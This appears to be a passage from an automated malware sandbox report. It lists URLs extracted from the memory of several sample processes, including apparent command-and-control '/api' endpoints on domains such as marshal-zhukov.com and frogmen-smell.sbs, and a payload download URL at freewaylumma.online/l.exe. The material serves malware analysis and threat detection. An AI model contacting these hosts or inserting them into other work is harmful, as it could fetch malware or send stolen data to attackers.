Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768067586.0000000005AC8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768191917.0000000005ABF000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2891340741.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2890694002.00000000056E3000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3057598446.0000000005C4F000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fadehairucw.store/
Source: 4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fadehairucw.store/N
Source: 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fadehairucw.store/api
Source: 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fadehairucw.store/apiA
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fadehairucw.store:443/api
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://freewaylumma.online/
Source: skotes.exe, 00000017.00000003.2782531663.000000000155B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000003.2773430604.0000000001557000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://freewaylumma.online/cgi-sys/suspendedpage.cgi
Source: skotes.exe, 00000017.00000003.2773430604.0000000001557000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://freewaylumma.online/l.exe
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://freewaylumma.online/l.exe1S=2Of
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://freewaylumma.online/l.exee
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://freewaylumma.online/l.exee9c09
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://freewaylumma.online/l.exee9c09317)
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://freewaylumma.online/l.exehpy
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://freewaylumma.online/l.exene
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://freewaylumma.online/l.exes1CALAP
Source: file1.exe, 00000018.00000003.2861364210.0000000001371000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2853326516.0000000001348000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813789486.0000000001348000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2852926387.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2881058680.00000000012E1000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2861763986.0000000001342000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2753737498.0000000001356000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2784537176.0000000001348000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2883648757.0000000001371000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2818198727.0000000001371000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2786414749.0000000001348000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2753913116.000000000135A000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813711418.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813431961.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2823212852.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813748659.000000000136F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2883266694.0000000001342000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/
Source: file1.exe, 00000018.00000002.2881058680.00000000012E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/#
Source: file1.exe, 00000018.00000003.2861763986.0000000001342000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2883266694.0000000001342000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/)
Source: file1.exe, 00000018.00000003.2767540588.000000000135D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/22
Source: file1.exe, 00000018.00000003.2852926387.0000000001377000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2883648757.0000000001377000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2797891117.0000000001378000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2797500848.0000000001374000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2861521129.0000000001377000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813431961.0000000001378000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2823212852.0000000001377000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/7
Source: file1.exe, 00000018.00000003.2861763986.0000000001342000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2883266694.0000000001342000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/Cy
Source: file1.exe, 00000018.00000003.2784537176.0000000001348000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2786414749.0000000001348000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/I
Source: file1.exe, 00000018.00000003.2852926387.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2753737498.0000000001356000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2881058680.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2783238474.000000000135D000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2883648757.0000000001371000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2773960825.000000000135F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813711418.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813431961.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2767540588.000000000135D000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2823212852.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813748659.000000000136F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/api
Source: file1.exe, 00000018.00000003.2813711418.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813431961.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813748659.000000000136F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/api7
Source: file1.exe, 00000018.00000003.2784335486.0000000001354000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2783238474.000000000135D000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813711418.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2818198727.000000000136B000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813431961.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2823212852.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2785238032.000000000135D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/api9)
Source: file1.exe, 00000018.00000003.2852926387.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2823212852.000000000136C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/apiF
Source: file1.exe, 00000018.00000002.2881058680.000000000128E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs/n
Source: file1.exe, 00000018.00000003.2797370105.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs:443/apiMicrosoft
Source: file1.exe, 00000018.00000002.2883648757.0000000001377000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2861521129.0000000001377000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://frogmen-smell.sbs:443/apifffla
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: 4136f86ac7.exe, 0000001E.00000003.2929916767.0000000005604000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929730577.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929560709.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2918822463.00000000055EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvI
Source: file1.exe, 00000018.00000003.2787061831.000000000137C000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3090918742.0000000005CAC000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3109019791.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: 4136f86ac7.exe, 00000025.00000003.3091077119.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3095179623.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074099471.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3093531602.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3096193571.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3096841796.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3191846589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3095820288.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3091523965.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3079259497.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094627589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094047183.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3139784082.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001517000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowe
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: 4136f86ac7.exe, 00000025.00000003.3119814255.000000000157B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/(
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/PAO
Source: 4136f86ac7.exe, 00000025.00000003.3091077119.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3093531602.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3091523965.0000000001564000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/S
Source: 4136f86ac7.exe, 0000001E.00000003.2903431989.0000000005606000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993268690.00000000055F8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2959514495.00000000055F8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2903502679.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2943712175.00000000055F8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2889137104.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2918876574.0000000000B34000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000002.3123970475.00000000055F2000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993587822.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2877411735.0000000000B34000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B23000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074099471.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3091077119.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3093531602.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3139784082.000000000150F000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3096193571.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3097797490.000000000156E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3119814255.0000000001580000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3098474106.0000000001573000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3091523965.0000000001564000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/api
Source: 4136f86ac7.exe, 00000025.00000003.3191846589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3139784082.0000000001517000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/apie
Source: 4136f86ac7.exe, 00000025.00000003.3119814255.0000000001580000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3191607562.0000000001580000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/apih
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/apii
Source: 4136f86ac7.exe, 0000001E.00000003.2866249485.0000000000AA5000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/apiile
Source: 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001517000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/apis
Source: 4136f86ac7.exe, 0000001E.00000003.2903431989.0000000005606000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/apiw
Source: 4136f86ac7.exe, 00000025.00000003.3074099471.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001564000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/c
Source: 4136f86ac7.exe, 00000025.00000003.3074099471.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3119814255.000000000157B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/k
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com:443/api
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com:443/apiicrosoft
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: file1.exe, 00000018.00000003.2773611648.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2773494993.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2773060112.0000000005A95000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2892615043.000000000560E000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2892291447.00000000056E1000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2892476979.000000000560B000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3059264012.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3058101617.0000000005D11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://msn.comXID/
Source: file1.exe, 00000018.00000003.2773611648.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2773494993.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2773060112.0000000005A95000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2892615043.000000000560E000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2892291447.00000000056E1000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2892476979.000000000560B000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3059264012.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3058101617.0000000005D11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://msn.comXIDv10:
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://navygenerayk.store:443/api
Source: powershell.exe, 00000019.00000002.2894050768.00000000055DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: 4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://presticitpo.store/
Source: 4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://presticitpo.store/0
Source: 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://presticitpo.store/api
Source: 4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://presticitpo.store/h
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://presticitpo.store:443/api
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com//
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/H
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/lstu
